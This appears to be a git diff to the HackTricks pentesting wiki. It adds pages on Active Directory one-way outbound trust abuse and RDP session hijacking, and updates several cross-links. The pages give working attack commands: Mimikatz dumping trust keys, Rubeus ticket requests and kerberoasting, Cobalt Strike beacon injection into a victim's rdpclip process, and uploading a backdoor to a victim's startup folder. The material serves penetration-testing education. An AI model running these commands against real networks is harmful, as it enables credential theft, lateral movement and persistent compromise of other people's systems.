diff --git a/.gitbook/assets/image (1) (4).png b/.gitbook/assets/image (1) (4).png
new file mode 100644
index 000000000..c61be6652
Binary files /dev/null and b/.gitbook/assets/image (1) (4).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index c61be6652..42cd08409 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (3).png b/.gitbook/assets/image (2) (3).png
new file mode 100644
index 000000000..fad6411f4
Binary files /dev/null and b/.gitbook/assets/image (2) (3).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index fad6411f4..0f8a86733 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 42cd08409..847a8c4e7 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 01b0cd0a3..9e1ea706b 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -166,6 +166,7 @@
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
* [External Forest Domain - OneWay (Inbound)](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
+ * [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
* [Forged Certificates](windows-hardening/active-directory-methodology/forged-certificates.md)
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
* [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md)
@@ -176,6 +177,7 @@
* [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md)
* [Force NTLM Privileged Authentication](windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
* [Privileged Accounts and Token Privileges](windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges.md)
+ * [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
* [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
* [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
* [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md
index f8f44f196..9f8649490 100644
--- a/network-services-pentesting/pentesting-rdp.md
+++ b/network-services-pentesting/pentesting-rdp.md
@@ -105,6 +105,12 @@ Combining this technique with **stickykeys** or **utilman you will be able to ac
You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer)
+#### With Cobalt Strike
+
+{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
+[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
+{% endcontent-ref %}
+
## Adding User to RDP group
```bash
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md
index 81d5f587a..293477cb8 100644
--- a/windows-hardening/active-directory-methodology/README.md
+++ b/windows-hardening/active-directory-methodology/README.md
@@ -192,47 +192,74 @@ Then, its time to dump all the hashes in memory and locally.\
**Once you have the hash of a user**, you can use it to **impersonate** it.\
You need to use some **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.\
-[**More information about this attack and about how does NTLM works here**](../ntlm/#pass-the-hash)**.**
+****[**Read this page for more information.**](../ntlm/#pass-the-hash)****
### Over Pass the Hash/Pass the Key
-This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.\
-[**More information about Over Pass the Hash/Pass the Key here.**](over-pass-the-hash-pass-the-key.md)
+This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.
+
+{% content-ref url="over-pass-the-hash-pass-the-key.md" %}
+[over-pass-the-hash-pass-the-key.md](over-pass-the-hash-pass-the-key.md)
+{% endcontent-ref %}
### Pass the Ticket
-This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.\
-[**More information about Pass the Ticket here**](pass-the-ticket.md)**.**
+This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the **ticket itself is stolen** and used to authenticate as its owner.
+
+{% content-ref url="pass-the-ticket.md" %}
+[pass-the-ticket.md](pass-the-ticket.md)
+{% endcontent-ref %}
### MSSQL Abuse & Trusted Links
If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\
Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands.\
-**The links between databases work even across forest trusts.**\
-[**More information about this technique here.**](abusing-ad-mssql.md)
+**The links between databases work even across forest trusts.**
+
+{% content-ref url="abusing-ad-mssql.md" %}
+[abusing-ad-mssql.md](abusing-ad-mssql.md)
+{% endcontent-ref %}
### Unconstrained Delegation
If you find any Computer object with the attribute [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.\
So, if a **Domain Admin logins onto the computer**, you will be able to dump his TGT and impersonate him using [Pass the Ticket](pass-the-ticket.md).\
-Thanks to constrained delegation you could even **automatically compromise a Print Server** (hopefully it will be a DC).\
-[**More information about this technique here.**](unconstrained-delegation.md)
+Thanks to constrained delegation you could even **automatically compromise a Print Server** (hopefully it will be a DC).
+
+{% content-ref url="unconstrained-delegation.md" %}
+[unconstrained-delegation.md](unconstrained-delegation.md)
+{% endcontent-ref %}
### Constrained Delegation
If a user or computer is allowed for "Constrained Delegation" it will be able to **impersonate any user to access some services in a computer**.\
-Then, if you **compromise the hash** of this user/computer you will be able to **impersonate any user** (even domain admins) to access some services.\
-[**More information about this attacks and some constrains here.**](constrained-delegation.md)
+Then, if you **compromise the hash** of this user/computer you will be able to **impersonate any user** (even domain admins) to access some services.
+
+{% content-ref url="constrained-delegation.md" %}
+[constrained-delegation.md](constrained-delegation.md)
+{% endcontent-ref %}
### ACLs Abuse
-The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.\
-[**More information about interesting privileges here.**](acl-persistence-abuse.md)
+The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
+
+{% content-ref url="acl-persistence-abuse.md" %}
+[acl-persistence-abuse.md](acl-persistence-abuse.md)
+{% endcontent-ref %}
### Printer Spooler service abuse
If you can find any **Spool service listening** inside the domain, you may be able to **abuse** is to **obtain new credentials** and **escalate privileges**.\
-[**More information about how to find a abuse Spooler services here.**](printers-spooler-service-abuse.md)
+[**More information about how to abuse Spooler services here.**](printers-spooler-service-abuse.md)
+
+### Third party sessions abuse
+
+If **other users** **access** the **compromised** machine, it's possible to **gather credentials from memory** and even **inject beacons in their processes** to impersonate them.\
+Usually users will access the system via RDP, so here you have how to performa couple of attacks over third party RDP sessions:
+
+{% content-ref url="rdp-sessions-abuse.md" %}
+[rdp-sessions-abuse.md](rdp-sessions-abuse.md)
+{% endcontent-ref %}
## Post-exploitation with high privilege account
@@ -443,23 +470,53 @@ It is possible to compromise the root domain in various ways. Examples:
### External Forest Domain - One-Way (Inbound)
+```powershell
+Get-DomainTrust
+SourceName : a.domain.local --> Current domain
+TargetName : domain.external --> Destination domain
+TrustType : WINDOWS-ACTIVE_DIRECTORY
+TrustAttributes :
+TrustDirection : Inbound --> Inboud trust
+WhenCreated : 2/19/2021 10:50:56 PM
+WhenChanged : 2/19/2021 10:50:56 PM
+```
+
In this scenario **your domain is trusted** by an external one giving you **undetermined permissions** over it. You will need to find **which principals of your domain have which access over the external domain** and then try to exploit it:
{% content-ref url="external-forest-domain-oneway-inbound.md" %}
[external-forest-domain-oneway-inbound.md](external-forest-domain-oneway-inbound.md)
{% endcontent-ref %}
-### Attack one-way trusted domain/forest (Trust account attack)
+### External Forest Domain - One-Way (Outbound)
-In short, if an attacker has administrative access to FORESTB which trusts FORESTA, the attacker can obtain the credentials for a _trust account_ located in FORESTA. This account is a member of Domain Users in FORESTA through its Primary Group. As we see too often, Domain Users membership is all that is necessary to identify and use other techniques and attack paths to become Domain Admin.
+```powershell
+Get-DomainTrust -Domain current.local
-![](https://images.squarespace-cdn.com/content/v1/5bbb4a7301232c6e6c8757fa/61a0233f-edd8-40b6-b6ae-8592a29875bd/Picture3.png)
+SourceName : current.local --> Current domain
+TargetName : external.local --> Destination domain
+TrustType : WINDOWS_ACTIVE_DIRECTORY
+TrustAttributes : FOREST_TRANSITIVE
+TrustDirection : Outbound --> Outbound trust
+WhenCreated : 2/19/2021 10:15:24 PM
+WhenChanged : 2/19/2021 10:15:24 PM
+```
-This technique is not limited to forest trust but works over any domain/forest one-way trust in the direction trusting -> trusted.
+In this scenario **your domain** is **trusting** some **privileges** to principal from a **different domains**.
-The trust protections (SID filtering, disabled SID history, and disabled TGT delegation) do not mitigate the technique.
+However, when a **domain is trusted** by the trusting domain, the trusted domain **creates a user** with a **predictable name** that uses as **password the trusted password**. Which means that it's possible to **access a user from the trusting domain to get inside the trusted one** to enumerate it and try to escalate more privileges:
-[Read more](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted)
+{% content-ref url="external-forest-domain-one-way-outbound.md" %}
+[external-forest-domain-one-way-outbound.md](external-forest-domain-one-way-outbound.md)
+{% endcontent-ref %}
+
+Another way to compromise the trusted domain is to find a [**SQL trusted link**](abusing-ad-mssql.md#mssql-trusted-links) created in the **opposite direction** of the domain trust (which isn't very common).
+
+Another way to compromise the trusted domain is to wait in a machine where a **user from the trusted domain can access** to login via **RDP**. Then, the attacker could inject code in the RDP session process and **access the origin domain of the victim** from there.\
+Moreover, if the **victim mounted his hard drive**, from the **RDP session** process the attacker could store **backdoors** in the **startup folder of the hard drive**. This technique is called **RDPInception.**
+
+{% content-ref url="rdp-sessions-abuse.md" %}
+[rdp-sessions-abuse.md](rdp-sessions-abuse.md)
+{% endcontent-ref %}
### Domain trust abuse mitigation
diff --git a/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
new file mode 100644
index 000000000..77f0f53a3
--- /dev/null
+++ b/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -0,0 +1,116 @@
+# External Forest Domain - One-Way (Outbound)
+
+
+
+Support HackTricks and get benefits!
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**๐ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐ฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+
+In this scenario **your domain** is **trusting** some **privileges** to principal from a **different domains**.
+
+## Enumeration
+
+### Outbound Trust
+
+```powershell
+# Notice Outbound trust
+Get-DomainTrust
+SourceName : root.local
+TargetName : ext.local
+TrustType : WINDOWS_ACTIVE_DIRECTORY
+TrustAttributes : FOREST_TRANSITIVE
+TrustDirection : Outbound
+WhenCreated : 2/19/2021 10:15:24 PM
+WhenChanged : 2/19/2021 10:15:24 PM
+
+# Lets find the current domain group giving permissions to the external domain
+Get-DomainForeignGroupMember
+GroupDomain : root.local
+GroupName : External Users
+GroupDistinguishedName : CN=External Users,CN=Users,DC=cyberbotic,DC=io
+MemberDomain : root.io
+MemberName : S-1-5-21-3022719512-2989052766-178205875-1115
+MemberDistinguishedName : CN=S-1-5-21-3022719512-2989052766-178205875-1115,CN=ForeignSecurityPrincipals,DC=cyberbotic,DC=io
+## Note how the members aren't from the current domain (ConvertFrom-SID won't work)
+```
+
+## Trust Account Attack
+
+When an Active Directory domain or forest trust is set up from a domain _B_ to a domain _A_ (_**B**_** trusts **_**A**_), a _**trust account**_** is created in domain **_**A**_**, named **_**B$**_. Kerberos _**trust keys**,_ derived from the **trust accountโs password**, are used for **encrypting inter-realm TGTs**, when users of domain A request service tickets for services in domain B.
+
+It's possible to obtain the password and hash of the trusted account from a Domain Controller using:
+
+```powershell
+Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
+```
+
+The risk is because of trust account B$ is enabled, **B$โs Primary Group is Domain Users of domain A**, any permission granted to Domain Users applies to B$, and it is possible to use B$โs credentials to authenticate against domain A.
+
+{% hint style="warning" %}
+Therefore, f**rom the trusting domain it's possible to obtain a user inside the trusted domain**. This user won't have a lot of permissions (just Domain Users probably) but you will be able to **enumerate the external domain**.
+{% endhint %}
+
+In this example the trusting domain is `ext.local` and the trusted one is `root.local`. Therefore, a user called `EXT$` is created inside `root.local`.
+
+```bash
+# Use mimikatz to dump trusted keys
+lsadump::trust /patch
+# You can see in the output the old and current credentials
+# You will find clear text, AES and RC4 hashes
+```
+
+Therefore, at this point have **`root.local\EXT$`**โs current **cleartext password and Kerberos secret key.** The **`root.local\EXT$`** Kerberos AES secret keys are on identical to the AES trust keys as a different salt is used, but the **RC4 keys are the same**. Therefore, we can **use the RC4 trust key** dumped from ext.local as to **authenticate** as `root.local\EXT$` against `root.local`.
+
+```bash
+.\Rubeus.exe asktgt /user:EXT$ /domain:root.local /rc4: /dc:dc.root.local /ptt
+```
+
+With this you can start enumerating that domain and even kerberoasting users:
+
+```
+.\Rubeus.exe kerberoast /user:svc_sql /domain:root.local /dc:dc.root.local
+```
+
+### Gathering cleartext trust password
+
+In the previous flow it was used the trust hash instead of the **clear text password** (that was also **dumped by mimikatz**).
+
+The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes โ\x00โ:
+
+![](<../../.gitbook/assets/image (2).png>)
+
+Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
+
+The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
+
+![](../../.gitbook/assets/image.png)
+
+## References
+
+* [https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted)
+
+
+
+Support HackTricks and get benefits!
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**๐ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐ฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges.md
index 5b8ca2c67..f92e61efc 100644
--- a/windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges.md
+++ b/windows-hardening/active-directory-methodology/privileged-accounts-and-token-privileges.md
@@ -1,7 +1,5 @@
# Privileged Accounts and Token Privileges
-## Privileged Accounts and Token Privileges
-
Support HackTricks and get benefits!
diff --git a/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md b/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
new file mode 100644
index 000000000..ba44017ba
--- /dev/null
+++ b/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -0,0 +1,103 @@
+# RDP Sessions Abuse
+
+
+
+Support HackTricks and get benefits!
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**๐ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐ฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+
+## RDP Process Injection
+
+If the **external group** has **RDP access** to any **computer** in the current domain, an **attacker** could **compromise that computer and wait for him**.
+
+Once that user has accessed via RDP, the **attacker can pivot to that users session** and abuse its permissions in the external domain.
+
+```powershell
+# Supposing the group "External Users" has RDP access in the current domain
+## lets find where they could access
+## The easiest way would be with bloodhound, but you could also run:
+Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
+#or
+Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
+
+# Then, compromise the listed machines, and wait til someone from the external domain logs in:
+net logons
+Logged on users at \\localhost:
+EXT\super.admin
+
+# With cobalt strike you could just inject a beacon inside of the RDP process
+beacon> ps
+ PID PPID Name Arch Session User
+ --- ---- ---- ---- ------- -----
+ ...
+ 4960 1012 rdpclip.exe x64 3 EXT\super.admin
+
+beacon> inject 4960 x64 tcp-local
+## From that beacon you can just run powerview modules interacting with the external domain as that user
+```
+
+Check **other ways to steal sessions with other tools** [**in this page.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)****
+
+## RDPInception
+
+If a user access via **RDP into a machine** where an **attacker** is **waiting** for him, the attacker will be able to **inject a beacon in the RDP session of the user** and if the **victim mounted his drive** when accessing via RDP, the **attacker could access it**.
+
+In this case you could just **compromise** the **victims** **original computer** by writing a **backdoor** in the **statup folder**.
+
+```powershell
+# Wait til someone logs in:
+net logons
+Logged on users at \\localhost:
+EXT\super.admin
+
+# With cobalt strike you could just inject a beacon inside of the RDP process
+beacon> ps
+ PID PPID Name Arch Session User
+ --- ---- ---- ---- ------- -----
+ ...
+ 4960 1012 rdpclip.exe x64 3 EXT\super.admin
+
+beacon> inject 4960 x64 tcp-local
+
+# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
+## \\tsclient\c is the C: drive on the origin machine of the RDP session
+beacon> ls \\tsclient\c
+
+ Size Type Last Modified Name
+ ---- ---- ------------- ----
+ dir 02/10/2021 04:11:30 $Recycle.Bin
+ dir 02/10/2021 03:23:44 Boot
+ dir 02/20/2021 10:15:23 Config.Msi
+ dir 10/18/2016 01:59:39 Documents and Settings
+ [...]
+
+# Upload backdoor to startup folder
+beacon> cd \\tsclient\c\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+beacon> upload C:\Payloads\pivot.exe
+```
+
+
+
+Support HackTricks and get benefits!
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**๐ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐ฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/windows-hardening/lateral-movement/dcom-exec.md b/windows-hardening/lateral-movement/dcom-exec.md
index 8b6f38af7..b91cfbb27 100644
--- a/windows-hardening/lateral-movement/dcom-exec.md
+++ b/windows-hardening/lateral-movement/dcom-exec.md
@@ -32,7 +32,7 @@ Fortunately, as an admin, you can remotely interact with DCOM with PowerShell by
It is then possible to invoke the `ExecuteShellCommand` method to start a process on the remote host:
-![](<../../.gitbook/assets/image (1).png>)
+![](<../../.gitbook/assets/image (1) (4).png>)
## ShellWindows & ShellBrowserWindow